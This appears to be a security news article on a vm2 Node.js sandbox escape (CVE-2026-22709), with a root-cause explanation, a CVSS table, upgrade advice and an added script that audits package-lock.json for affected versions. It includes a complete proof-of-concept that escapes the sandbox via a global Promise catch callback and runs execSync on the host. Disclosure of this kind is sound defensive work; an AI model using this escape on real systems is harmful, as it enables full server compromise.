The well-known Node.js sandboxing library vm2 has a serious flaw that lets attackers escape the sandbox and run arbitrary system commands on the host, undermining the isolation guarantees of the vm2 sandbox. vm2 versions up to and including 3.10.0 are affected by the problem, which is tracked as CVE-2026-22709 and is resolved in version 3.10.2.
In advisory GHSA-99p7-6v5w-7xg8, security researcher Patriksimek explained how Promise callback sanitization in vm2 can be circumvented, allowing untrusted sandboxed code to run as full host code.

How the Exploit Operates

Inconsistent sanitization of Promise callbacks within the sandbox is the root of the vulnerability. In lib/setup-sandbox.js, only the callbacks passed to localPromise.prototype.then are sanitized; GlobalPromise.prototype.then is left unsanitized.
Because an async function returns a global Promise object, attackers can abuse this gap to run arbitrary code outside the intended sandbox restrictions. The provided proof-of-concept (PoC) demonstrates the impact clearly:

```js
const { VM } = require("vm2");

const code = `
  // A crafted Error whose stack getter will throw inside an async function
  const error = new Error();
  error.name = Symbol();
  const f = async () => error.stack;
  // The async function returns a global (unsanitized) Promise
  const promise = f();
  promise.catch(e => {
    // The rejection value is a host object, so its constructor chain reaches
    // the host Function constructor
    const Error = e.constructor;
    const Function = Error.constructor;
    const f = new Function(
      "process.mainModule.require('child_process').execSync('echo HELLO WORLD! ', { stdio: 'inherit' })"
    );
    f();
  });
`;

new VM().run(code);
```

In this exploit, the attacker uses a crafted Error object, an async function, and a promise.catch callback to reach the host Function constructor and then call child_process.execSync.
This permits arbitrary command execution on the underlying system and completely violates the isolation guarantees of the vm2 sandbox.

| Field | Information |
| --- | --- |
| CVE ID | CVE-2026-22709 |
| Package | vm2 (npm) |
| Versions Affected | <= 3.10.0 |
| Severity | Critical |
| CVSS v3.1 vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |

The CVSS v3.1 vector rates the vulnerability as Critical: it can be triggered remotely over a network, requires no privileges or user interaction, and can completely compromise confidentiality, integrity, and availability.
Any application that executes user-supplied or untrusted code using vm2 is directly exposed. A successful exploit enables an attacker to execute system commands with the Node.js process's permissions, which could result in data theft, lateral movement, or complete server takeover. All vm2 versions <= 3.10.0 are susceptible.
VM2 version 3.10.2 resolves the problem. On any unpatched instance exposed to untrusted input, developers should assume that sandbox escape is possible and upgrade to 3.10.2 or later right away. Patching should be given top priority by administrators and developers who depend on VM2 for isolation, and logs should be examined for questionable sandboxed code activity.
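To help with the upgrade step above, here is an added example (not code from the advisory or the vm2 project) that audits an npm package-lock.json for vm2 copies in the affected range. It assumes the lockfileVersion 2/3 "packages" layout and uses a constructed sample lockfile.

```javascript
// Added example (not from the advisory or the vm2 project): audit an npm
// package-lock.json for vm2 versions in the affected range (<= 3.10.0).
// Version bounds come from the advisory text; the lockfile below is constructed.

const LAST_VULNERABLE = "3.10.0"; // highest affected version
const FIXED_VERSION = "3.10.2";   // version that resolves the issue

// Numeric dotted-version comparison: <0 if a < b, 0 if equal, >0 if a > b.
// A pre-release suffix (e.g. "3.10.2-beta") is ignored here for simplicity.
function compareVersions(a, b) {
  const pa = a.split("-")[0].split(".").map(Number);
  const pb = b.split("-")[0].split(".").map(Number);
  for (let i = 0; i < Math.max(pa.length, pb.length); i++) {
    const d = (pa[i] || 0) - (pb[i] || 0);
    if (d !== 0) return d;
  }
  return 0;
}

function isVulnerableVm2(version) {
  return compareVersions(version, LAST_VULNERABLE) <= 0;
}

// Walk the "packages" map of a lockfileVersion 2/3 package-lock.json and
// report every vm2 copy, including nested ones pulled in by other packages.
function auditLockfile(lock) {
  const findings = [];
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    if (path === "node_modules/vm2" || path.endsWith("/node_modules/vm2")) {
      findings.push({ path, version: entry.version, vulnerable: isVulnerableVm2(entry.version) });
    }
  }
  return findings;
}

// Constructed sample: a direct vm2 3.9.19 plus a nested copy already on 3.10.2.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    "": { name: "demo-app" },
    "node_modules/vm2": { version: "3.9.19" },
    "node_modules/some-plugin/node_modules/vm2": { version: "3.10.2" },
  },
};

for (const f of auditLockfile(SAMPLE_LOCK)) {
  const verdict = f.vulnerable ? `VULNERABLE, upgrade to >= ${FIXED_VERSION}` : "ok";
  console.log(`${f.path}@${f.version}: ${verdict}`);
}
```

Nested copies matter because a transitive dependency can keep an old vm2 on disk even after the top-level package is upgraded.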